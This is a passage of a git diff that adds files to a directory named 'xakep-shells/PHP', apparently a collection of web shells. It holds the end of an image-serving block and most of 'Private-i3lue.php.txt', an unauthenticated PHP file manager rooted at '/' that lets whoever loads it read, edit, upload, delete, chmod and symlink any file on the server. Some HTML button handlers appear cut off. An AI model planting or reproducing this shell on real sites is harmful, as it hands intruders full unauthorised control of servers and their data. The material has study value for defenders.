+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS'.
+'krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j'.
+'VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=',
+'back'=>
+'R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8'.
+'aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt'.
+'Wg0JADs='
+
+);
+
+
+   header("Content-type: image/gif");
+   header("Cache-control: public");
+   // /*
+   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+   header("Cache-control: max-age=".(60*60*24*7));
+   header("Last-Modified: ".date("r",filemtime(__FILE__)));
+   // */
+   echo base64_decode($img[$name]);
+
+   break;
+
+}
+
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Private-i3lue.php.txt b/xakep-shells/PHP/Private-i3lue.php.txt
new file mode 100644
index 0000000..93abbae
--- /dev/null
+++ b/xakep-shells/PHP/Private-i3lue.php.txt
@@ -0,0 +1,1456 @@
+<?php
+/*
+ * webadmin.php - a simple Web-based file manager
+ * Copyright (C) 2002  Daniel Wacker <mail@wacker-welt.de>
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *
+/* ------------------------------------------------------------------------- */
+
+/* Select your language:
+ * 'en' - English
+ * 'de' - German
+ * 'cz' - Czech
+ * 'it' - Italian
+ */
+$language = 'en';
+
+/* This directory is shown when you start webadmin.php.
+ * For example: './' would be the current directory.
+ */
+$homedir = './';
+
+/* This sets the root directory of the treeview.
+ * Set it to '/' to see the whole filesystem.
+ */
+$treeroot = '/';
+
+/* When you create a directory, its permission is set to this octal value.
+ * For example: 0705 would be 'drwx---r-x'.
+ */
+$dirpermission = 0705;
+
+/* Uncomment the following line to enable this feature (remove #):
+ * When you create a file, its permission is set to this octal value.
+ * For example: 0644 would be 'drwxr--r--'.
+ */
+# $newfilepermission = 0666;
+
+/* Uncomment the following line to enable this feature (remove #):
+ * When you upload a file, its permission is set to this octal value.
+ * For example: 0644 would be 'drwxr--r--'.
+ */
+# $uploadedfilepermission = 0666;
+
+/* The size of the file edit textarea
+ */
+$editrows = 20;
+$editcols = 70;
+
+/* ------------------------------------------------------------------------- */
+
+$self = htmlentities(basename($_SERVER['PHP_SELF']));
+$homedir = relpathtoabspath($homedir, getcwd());
+$treeroot = relpathtoabspath($treeroot, getcwd());
+$words = getwords($language);
+
+/* If PHP added any slashes, strip them */
+if (ini_get('magic_quotes_gpc')) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+
+/* Return Images */
+if (isset($_GET['imageid'])) {
+	header('Content-Type: image/gif');
+	echo(getimage($_GET['imageid']));
+	exit;
+}
+
+/* Initialize session */
+ini_set('session.use_cookies', FALSE);
+ini_set('session.use_trans_sid', FALSE);
+session_name('id');
+session_start();
+
+/* Initialize dirlisting output */
+$error = $notice = '';
+$updatetreeview = FALSE;
+
+/* Handle treeview requests */
+if (isset($_REQUEST['action'])) {
+	switch ($_REQUEST['action']) {
+	case 'treeon':
+		$_SESSION['tree'] = array();
+		$_SESSION['hassubdirs'][$treeroot] = tree_hassubdirs($treeroot);
+		tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $treeroot);
+		frameset();
+		exit;
+	case 'treeoff':
+		$_SESSION['tree'] = NULL;
+		$_SESSION['hassubdirs'] = NULL;
+		dirlisting();
+		exit;
+	}
+}
+
+/* Set current directory */
+if (!isset($_SESSION['dir'])) {
+	$_SESSION['dir'] = $homedir;
+	$updatetreeview = TRUE;
+}
+if (!empty($_REQUEST['dir'])) {
+	$newdir = relpathtoabspath($_REQUEST['dir'], $_SESSION['dir']);
+	/* If the requested directory is a file, show the file */
+	if (@is_file($newdir) && @is_readable($newdir)) {
+		/* if (@is_writable($newdir)) {
+			$_REQUEST['edit'] = $newdir;
+		} else */ if (is_script($newdir)) {
+			$_GET['showh'] = $newdir;
+		} else {
+			$_GET['show'] = $newdir;
+		}
+	} elseif ($_SESSION['dir'] != $newdir) {
+		$_SESSION['dir'] = $newdir;
+		$updatetreeview = TRUE;
+	}
+}
+
+/* Show a file */
+if (!empty($_GET['show'])) {
+	$show = relpathtoabspath($_GET['show'], $_SESSION['dir']);
+	if (!show($show)) {
+		$error= buildphrase('&quot;<b>' . htmlentities($show) . '</b>&quot;', $words['cantbeshown']);
+	} else {
+		exit;
+	}
+}
+
+/* Show a file syntax highlighted */
+if (!empty($_GET['showh'])) {
+	$showh = relpathtoabspath($_GET['showh'], $_SESSION['dir']);
+	if (!show_highlight($showh)) {
+		$error = buildphrase('&quot;<b>' . htmlentities($showh) . '</b>&quot;', $words['cantbeshown']);
+	} else {
+		exit;
+	}
+}
+
+/* Upload file */
+if (isset($_FILES['upload'])) {
+	$file = relpathtoabspath($_FILES['upload']['name'], $_SESSION['dir']);
+	if (@is_writable($_SESSION['dir']) && @move_uploaded_file($_FILES['upload']['tmp_name'], $file) && (!isset($uploadedfilepermission) || chmod($file, $uploadedfilepermission))) {
+		$notice = buildphrase(array('&quot;<b>' . htmlentities(basename($file)) . '</b>&quot;', '&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot;'), $words['uploaded']);
+	} else {
+		$error = buildphrase(array('&quot;<b>' . htmlentities(basename($file)) . '</b>&quot;', '&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot;'), $words['notuploaded']);
+	}
+}
+
+/* Create file */
+if (!empty($_GET['create']) && $_GET['type'] == 'file') {
+	$file = relpathtoabspath($_GET['create'], $_SESSION['dir']);
+	if (substr($file, strlen($file) - 1, 1) == '/') $file = substr($file, 0, strlen($file) - 1);
+	if (is_free($file) && touch($file) && ((!isset($newfilepermission)) || chmod($file, $newfilepermission))) {
+		$notice = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['created']);
+		$_REQUEST['edit'] = $file;
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['notcreated']);
+	}
+}
+
+/* Create directory */
+if (!empty($_GET['create']) && $_GET['type'] == 'dir') {
+	$file = relpathtoabspath($_GET['create'], $_SESSION['dir']);
+	if (is_free($file) && @mkdir($file, $dirpermission)) {
+		$notice = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['created']);
+		$updatetreeview = TRUE;
+		if (!empty($_SESSION['tree'])) {
+			$file = spath(dirname($file));
+			$_SESSION['hassubdirs'][$file] = TRUE;
+			tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $file);
+		}
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['notcreated']);
+	}
+}
+
+/* Ask symlink target */
+if (!empty($_GET['symlinktarget']) && empty($_GET['symlink'])) {
+	$symlinktarget = relpathtoabspath($_GET['symlinktarget'], $_SESSION['dir']);
+	html_header($words['createsymlink']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="symlinktarget" value="<?php echo(htmlentities($_GET['symlinktarget'])); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#EEEEEE">
+			<table border="0">
+			<tr>
+				<td valign="top"><?php echo($words['target']); ?>:&nbsp;</td>
+				<td>
+					<b><?php echo(htmlentities($_GET['symlinktarget'])); ?></b><br>
+					<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked>
+					<label for="checkbox_relative"><?php echo($words['reltarget']); ?></label>
+				</td>
+			</tr>
+			<tr>
+				<td><?php echo($words['symlink']); ?>:&nbsp;</td>
+				<td><input type="text" name="symlink" value="<?php echo(htmlentities(spath(dirname($symlinktarget)))); ?>" size="<?php $size = strlen($_GET['symlinktarget']) + 9; if ($size < 30) $size = 30; echo($size);  ?>"></td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['create']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+	html_footer();
+	exit;
+}
+
+/* Create symlink */
+if (!empty($_GET['symlink']) && !empty($_GET['symlinktarget'])) {
+	$symlink = relpathtoabspath($_GET['symlink'], $_SESSION['dir']);
+	$target = $_GET['symlinktarget'];
+	if (@is_dir($symlink)) $symlink = spath($symlink) . basename($target);
+	if ($symlink == $target) {
+		$error = buildphrase(array('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', '&quot;<b>' . htmlentities($target) . '</b>&quot;'), $words['samefiles']);
+	} else {
+		if (@$_GET['relative'] == 'yes') {
+			$target = abspathtorelpath(dirname($symlink), $target);
+		} else {
+			$target = $_GET['symlinktarget'];
+		}
+		if (is_free($symlink) && @symlink($target, $symlink)) {
+			$notice = buildphrase('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', $words['created']);
+		} else {
+			$error = buildphrase('&quot;<b>' . htmlentities($symlink) . '</b>&quot;', $words['notcreated']);
+		}
+	}
+}
+
+/* Delete file */
+if (!empty($_GET['delete'])) {
+	$delete = relpathtoabspath($_GET['delete'], $_SESSION['dir']);
+	if (@$_GET['sure'] == 'TRUE') {
+		if (remove($delete)) {
+			$notice = buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['deleted']);
+		} else {
+			$error = buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['notdeleted']);
+		}
+	} else {
+		html_header($words['delete']);
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#FFFFFF"><?php echo(buildphrase('&quot;<b>' . htmlentities($delete) . '</b>&quot;', $words['suredelete'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" align="center" bgcolor="#EEEEEE">
+			<a href="<?php echo("$self?" . SID . '&delete=' . urlencode($delete) . '&sure=TRUE'); ?>">[ <?php echo($words['yes']); ?> ]</a>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</p>
+<?php
+		html_footer();
+		exit;
+	}
+}
+
+/* Change permission */
+if (!empty($_GET['permission'])) {
+	$permission = relpathtoabspath($_GET['permission'], $_SESSION['dir']);
+	if ($p = @fileperms($permission)) {
+		if (!empty($_GET['set'])) {
+			$p = 0; 
+			if (isset($_GET['ur'])) $p |= 0400; if (isset($_GET['uw'])) $p |= 0200; if (isset($_GET['ux'])) $p |= 0100;
+			if (isset($_GET['gr'])) $p |= 0040; if (isset($_GET['gw'])) $p |= 0020; if (isset($_GET['gx'])) $p |= 0010;
+			if (isset($_GET['or'])) $p |= 0004; if (isset($_GET['ow'])) $p |= 0002; if (isset($_GET['ox'])) $p |= 0001;
+			if (@chmod($_GET['permission'], $p)) {
+				$notice = buildphrase(array('&quot<b>' . htmlentities($permission) . '</b>&quot;', '&quot;<b>' . substr(octtostr("0$p"), 1) . '</b>&quot; (<b>' . decoct($p) . '</b>)'), $words['permsset']);
+			} else {
+				$error = buildphrase('&quot;<b>' . htmlentities($permission) . '</b>&quot;', $words['permsnotset']);
+			}
+		} else {
+			html_header($words['permission']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE" colspan="2">
+			<table>
+			<tr>
+				<td><?php echo($words['file']); ?>:</td>
+				<td><input type="text" name="permission" value="<?php echo(htmlentities($permission)); ?>" size="<?php echo(textfieldsize($permission)); ?>"></td>
+				<td><input type="submit" value="<?php echo($words['change']); ?>"></td>
+			</tr>
+			<tr>
+				<td valign="top">
+					<?php echo($words['permission']); ?>:&nbsp;
+					</form><form action="<?php echo($self); ?>" method="get">
+					<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+					<input type="hidden" name="permission" value="<?php echo(htmlentities($permission)); ?>">
+					<input type="hidden" name="set" value="TRUE">
+				</td>
+				<td colspan="2">
+					<table border="0">
+					<tr>
+						<td>&nbsp;</td>
+						<td><?php echo($words['owner']); ?></td>
+						<td><?php echo($words['group']); ?></td>
+						<td><?php echo($words['other']); ?></td>
+					</tr>
+					<tr>
+						<td><?php echo($words['read']); ?>:</td>
+						<td align="center"><input type="checkbox" name="ur" value="1"<?php if ($p & 00400) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="gr" value="1"<?php if ($p & 00040) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="or" value="1"<?php if ($p & 00004) echo(' checked'); ?>></td>
+					</tr>
+					<tr>
+						<td><?php echo($words['write']); ?>:</td>
+						<td align="center"><input type="checkbox" name="uw" value="1"<?php if ($p & 00200) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="gw" value="1"<?php if ($p & 00020) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="ow" value="1"<?php if ($p & 00002) echo(' checked'); ?>></td>
+					</tr>
+					<tr>
+						<td><?php echo($words['exec']); ?>:</td>
+						<td align="center"><input type="checkbox" name="ux" value="1"<?php if ($p & 00100) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="gx" value="1"<?php if ($p & 00010) echo(' checked'); ?>></td>
+						<td align="center"><input type="checkbox" name="ox" value="1"<?php if ($p & 00001) echo(' checked'); ?>></td>
+					</tr>
+					</table>
+				</td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td colspan="2"><input type="submit" value="<?php echo($words['setperms']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+			html_footer();
+			exit;
+		}
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($permission) . '</b>&quot;', $words['permsnotset']);
+	}
+}
+
+/* Move file */
+if (!empty($_GET['move'])) {
+	$move = relpathtoabspath($_GET['move'], $_SESSION['dir']);
+	if (!empty($_GET['destination'])) {
+		$destination = relpathtoabspath($_GET['destination'], dirname($move));
+		if (@is_dir($destination)) $destination = spath($destination) . basename($move);
+		if ($move == $destination) {
+			$error = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['samefiles']);
+		} else {
+			if (is_free($destination) && @rename($move, $destination)) {
+				$notice = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['moved']);
+			} else {
+				$error = buildphrase(array('&quot;<b>' . htmlentities($move) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['notmoved']);
+			}
+		}
+	} else {
+		html_header($words['move']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="move" value="<?php echo(htmlentities($move)); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#EEEEEE">
+			<table border="0">
+			<tr>
+				<td><?php echo($words['file']); ?>:&nbsp;</td>
+				<td><b><?php echo(htmlentities($move)); ?></b></td>
+			</tr>
+			<tr>
+				<td><?php echo($words['moveto']); ?>:&nbsp;</td>
+				<td><input type="text" name="destination" value="<?php echo(htmlentities(spath(dirname($move)))); ?>" size="<?php echo(textfieldsize($move)); ?>"></td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['move']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+		html_footer();
+		exit;
+	}
+}
+
+/* Copy file */
+if (!empty($_GET['cpy'])) {
+	$copy = relpathtoabspath($_GET['cpy'], $_SESSION['dir']);
+	if (!empty($_GET['destination'])) {
+		$destination = relpathtoabspath($_GET['destination'], dirname($copy));
+          if (@is_dir($destination)) $destination = spath($destination) . basename($copy);
+		if ($copy == $destination) {
+			$error = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['samefiles']);
+		} else {
+			if (is_free($destination) && @copy($copy, $destination)) {
+				$notice = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['copied']);
+			} else {
+				$error = buildphrase(array('&quot;<b>' . htmlentities($copy) . '</b>&quot;', '&quot;<b>' . htmlentities($destination) . '</b>&quot;'), $words['notcopied']);
+			}
+		}
+	} else {
+		html_header($words['copy']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="cpy" value="<?php echo(htmlentities($copy)); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#EEEEEE">
+			<table border="0">
+			<tr>
+				<td><?php echo($words['file']); ?>:&nbsp;</td>
+				<td><b><?php echo(htmlentities($copy)); ?></b></td>
+			</tr>
+			<tr>
+				<td><?php echo($words['copyto']); ?>:&nbsp;</td>
+				<td><input type="text" name="destination" value="<?php echo(htmlentities(spath(dirname($copy)))); ?>" size="<?php echo(textfieldsize($copy)); ?>"></td>
+			</tr>
+			<tr>
+				<td>&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['copy']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+		html_footer();
+		exit;
+	}
+}
+
+/* Save edited file */
+if (!empty($_POST['edit']) && isset($_POST['save'])) {
+	$edit = relpathtoabspath($_POST['edit'], $_SESSION['dir']);
+	if ($f = @fopen($edit, 'w')) {
+		/* write file without carriage returns */
+		fwrite($f, str_replace("\r\n", "\n", $_POST['content']));
+		fclose($f);
+		$notice = buildphrase('&quot;<b>' . htmlentities($edit) . '</b>&quot;', $words['saved']);
+	} else {
+		$error = buildphrase('&quot;<b>' . htmlentities($edit) . '</b>&quot;', $words['notsaved']);
+	}
+}
+
+/* Edit file */
+if (isset($_REQUEST['edit']) && !isset($_POST['save'])) {
+	$file = relpathtoabspath($_REQUEST['edit'], $_SESSION['dir']);
+	if (@is_dir($file)) {
+		/* If the requested file is a directory, show the directory */
+		$_SESSION['dir'] = $file;
+		$updatetreeview = TRUE;
+	} else {
+		if ($f = @fopen($file, 'r')) {
+			html_header($words['edit']);
+?>
+	<form action="<?php echo($self); ?>" method="get">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td bgcolor="#EEEEEE" colspan="2">
+			<table border="0" cellspacing="0" cellpadding="0">
+			<tr>
+				<td><?php echo($words['file']); ?>:&nbsp;</td>
+				<td><input type="text" name="edit" value="<?php echo(htmlentities($file)); ?>" size="<?php echo(textfieldsize($file)); ?>">&nbsp;</td>
+				<td><input type="submit" value="<?php echo($words['change']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+	<form action="<?php echo($self); ?>" method="post" name="f">
+	<input type="hidden" name="id" value="<?php echo(session_id()); ?>">
+	<input type="hidden" name="edit" value="<?php echo(htmlentities($file)); ?>">
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEFF" align="center"><textarea name="content" rows="<?php echo($editrows); ?>" cols="<?php echo($editcols); ?>" wrap="off" style="background: #EEEEFF; border: none;"><?php
+			if (isset($_POST['content'])) {
+				echo(htmlentities($_POST['content']));
+				if (isset($_POST['add']) && !empty($_POST['username']) && !empty($_POST['password'])) {
+					echo("\n" . htmlentities($_POST['username'] . ':' . crypt($_POST['password'])));
+				}
+			} else {
+				echo(htmlentities(fread($f, filesize($file))));
+			}
+			fclose($f);
+?></textarea></td>
+	</tr>
+<?php if (basename($file) == '.htpasswd') { /* specials with .htpasswd */ ?>
+	<tr>
+		<td bgcolor="#EEEEEE" align="center">
+			<table border="0">
+			<tr>
+				<td><?php echo($words['username']); ?>:&nbsp;</td>
+				<td><input type="text" name="username" size="15">&nbsp;</td>
+				<td><?php echo($words['password']); ?>:&nbsp;</td>
+				<td><input type="password" name="password" size="15">&nbsp;</td>
+				<td><input type="submit" name="add" value="<?php echo($words['add']); ?>"></td>
+			</tr>
+			</table>
+		</td>
+	</tr>
+<?php } if (basename($file) == '.htaccess') { /* specials with .htaccess */ ?>
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><input type="button" value="<?php echo($words['addauth']); ?>" 
+	</tr>
+<?php } ?>
+	<tr>
+		<td bgcolor="#EEEEEE" align="center">
+			<input type="button" value="<?php echo($words['reset']); ?>" 
+			<input type="button" value="<?php echo($words['clear']); ?>" '')">
+			<input type="submit" name="save" value="<?php echo($words['save']); ?>">
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</form>
+<?php
+			html_footer();
+			exit;
+		} else {
+			$error = buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot; ', $words['notopened']);
+		}
+	}
+}
+
+/* Show directory listing (and treeview) */
+if (!empty($_SESSION['tree'])) {
+	if (isset($_REQUEST['frame']) && $_REQUEST['frame'] == 'treeview') {
+		treeview();
+	} else {
+		if (isset($_GET['noupdate'])) $updatetreeview = FALSE;
+		dirlisting(TRUE);
+	}
+} else {
+	dirlisting();
+}
+
+/* ------------------------------------------------------------------------- */
+
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+
+function relpathtoabspath ($file, $dir) {
+	$dir = spath($dir);
+	if (substr($file, 0, 1) != '/') $file = $dir . $file;
+	if (!@is_link($file) && ($r = realpath($file)) != FALSE) $file = $r;
+	if (@is_dir($file) && !@is_link($file)) $file = spath($file);
+	return $file;
+}
+
+function abspathtorelpath ($pos, $target) {
+	$pos = spath($pos);
+	$path = '';
+	while ($pos != $target) {
+		if ($pos == substr($target, 0, strlen($pos))) {
+			$path .= substr($target, strlen($pos));
+			break;
+		} else {
+			$path .= '../';
+			$pos = strrev(strstr(strrev(substr($pos, 0, strlen($pos) - 1)), '/'));
+		}
+	}
+	return $path;
+}
+
+function is_script ($file) {
+	return ereg('.php[3-4]?$', $file);
+}
+
+function spath ($path) {
+	if (substr($path, strlen($path) - 1, 1) != '/') $path .= '/';
+	return $path;
+}
+
+function textfieldsize ($str) {
+	$size = strlen($str) + 5;
+	if ($size < 30) $size = 30;
+	return $size;
+}
+
+function is_free ($file) {
+	global $words;
+	if (@file_exists($file) && empty($_GET['overwrite'])) {
+		html_header($words['alreadyexists']);
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4">
+	<tr>
+		<td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
+		<td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" bgcolor="#FFFFFF"><?php echo(buildphrase('&quot;<b>' . htmlentities($file) . '</b>&quot;', $words['overwrite'])); ?></td>
+	</tr>
+	<tr>
+		<td colspan="2" align="center" bgcolor="#EEEEEE">
+			<a href="<?php echo("{$_SERVER['REQUEST_URI']}&overwrite=yes"); ?>">[ <?php echo($words['yes']); ?> ]</a>
+		</td>
+	</tr>
+	</table>
+	</td></tr></table>
+	</p>
+<?php
+		html_footer();
+		exit;
+	}
+	if (!empty($_GET['overwrite'])) {
+		return remove($file);
+	}
+	return TRUE;
+}
+
+function remove ($file) {
+	global $updatetreeview;
+	if (@is_dir($file) && !@is_link($file)) {
+		$error = FALSE;
+		if ($p = @opendir($file = spath($file))) {
+			while (($f = readdir($p)) !== FALSE)
+				if ($f != '.' && $f != '..' && !remove($file . $f))
+					$error = TRUE;
+		}
+		if ($error) $x = FALSE; else $x = @rmdir($file);
+		$updatetreeview = TRUE;
+		if ($x && !empty($_SESSION['tree'])) {
+			$file = spath(dirname($file));
+			$_SESSION['hassubdirs'][$file] = tree_hassubdirs($file);
+			tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $file, TRUE);
+		}
+	} else {
+		$x = @unlink($file);
+	}
+	return $x;
+}
+
+function getwords ($language) {
+	switch ($language) {
+	case 'de':
+		$words['dir'] = 'Verzeichnis'; $words['file'] = 'Datei';
+		$words['filename'] = 'Dateiname'; $words['size'] = 'Gr&ouml;&szlig;e'; $words['permission'] = 'Rechte'; $words['functions'] = 'Funktionen';
+		$words['owner'] = 'Eigner'; $words['group'] = 'Gruppe'; $words['other'] = 'Andere';
+		$words['create'] = 'erstellen'; $words['copy'] = 'kopieren'; $words['copyto'] = 'kopieren nach'; $words['move'] = 'verschieben'; $words['moveto'] = 'verschieben nach'; $words['delete'] = 'l&ouml;schen'; $words['edit'] = 'editieren';
+		$words['read'] = 'lesen'; $words['write'] = 'schreiben'; $words['exec'] = 'ausf&uuml;hren'; $words['change'] = 'wechseln'; $words['upload'] = 'hochladen'; $words['configure'] = 'konfigurieren';
+		$words['yes'] = 'ja'; $words['no'] = 'nein';
+		$words['back'] = 'zur&uuml;ck'; $words['setperms'] = 'Rechte setzen';
+		$words['readingerror'] = 'Fehler beim Lesen von 1';
+		$words['permsset'] = 'Die Rechte von 1 wurden auf 2 gesetzt.'; $words['permsnotset'] = 'Die Rechte von 1 konnten nicht gesetzt werden.';
+		$words['uploaded'] = '1 wurde nach 2 hochgeladen.'; $words['notuploaded'] = '1 konnte nicht nach 2 hochgeladen werden.';
+		$words['moved'] = '1 wurde nach 2 verschoben.'; $words['notmoved'] = '1 konnte nicht nach 2 verschoben werden.';
+		$words['copied'] = '1 wurde nach 2 kopiert.'; $words['notcopied'] = '1 konnte nicht nach 2 kopiert werden.';
+		$words['created'] = '1 wurde erstellt.'; $words['notcreated'] = '1 konnte nicht erstellt werden.';
+		$words['deleted'] = '1 wurde gel&ouml;scht.'; $words['notdeleted'] = '1 konnte nicht gel&ouml;scht werden.'; $words['suredelete'] = '1 wirklich l&ouml;schen?';
+		$words['saved'] = '1 wurde gespeichert.'; $words['notsaved'] = '1 konnte nicht gespeichert werden.';
+		$words['reset'] = 'zur&uuml;cksetzen'; $words['clear'] = 'verwerfen'; $words['save'] = 'speichern';
+		$words['cantbeshown'] = '1 kann nicht angezeigt werden.'; $words['sourceof'] = 'Quelltext von 1';
+		$words['notopened'] = '1 konnte nicht ge&ouml;ffnet werden.';
+		$words['addauth'] = 'Standard-Authentifizierungseinstellungen hinzuf&uuml;gen';
+		$words['username'] = 'Benutzername'; $words['password'] = 'Kennwort'; $words['add'] = 'hinzuf&uuml;gen';
